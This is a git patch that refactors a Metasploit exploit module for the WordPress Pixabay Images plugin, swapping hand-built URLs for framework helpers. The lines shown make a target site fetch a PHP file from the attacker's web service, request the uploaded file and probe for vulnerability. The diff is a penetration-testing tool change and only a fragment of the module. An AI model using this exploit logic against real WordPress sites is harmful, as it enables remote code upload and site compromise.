From 11bf58e5485b2b77d6dc82af64321da21b48f684 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?=
 <muench@mogwaisecurity.de>
Date: Fri, 23 Jan 2015 08:48:52 +0100
Subject: [PATCH] Use metasploit methods

---
 .../webapp/php_wordpress_pixabay_images.rb    | 19 ++++++-------------
 1 file changed, 6 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
index 691711178c..3157050043 100644
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -62,13 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return datastore['DOWNURI'] if datastore['DOWNURI']
 
       # Create a custom URI
-      custom_uri = "http://" + datastore['SRVHOST']
-
-      if datastore['SRVPORT'] != "80" then
-          custom_uri += ":" + datastore['SRVPORT'].to_s
-      end
-
-      custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+      custom_uri = get_uri + ".php"
       return custom_uri
   end
 
@@ -77,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
       real_fn = "#{file_name}_#{epoch_time.to_s}.php"
       res = send_request_cgi({
           'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
+          'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
           })
       return res
   end
@@ -87,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
     end
 
-
-    print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+    print_status("Starting up web service...")
     start_service
 
     # did the user provide his own url
@@ -105,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi({
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'uri' => normalize_uri(wordpress_url_backend),
         'vars_post' => post,
         })
 
@@ -144,12 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi({
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+        'uri' => normalize_uri(wordpress_url_backend),
         'vars_post' => post,
         })
 
 
-    if res.body and (res.body =~ /Error: A valid URL was not provided/)
+    if res and (res.body =~ /Error: A valid URL was not provided/)
       return Exploit::CheckCode::Vulnerable
     end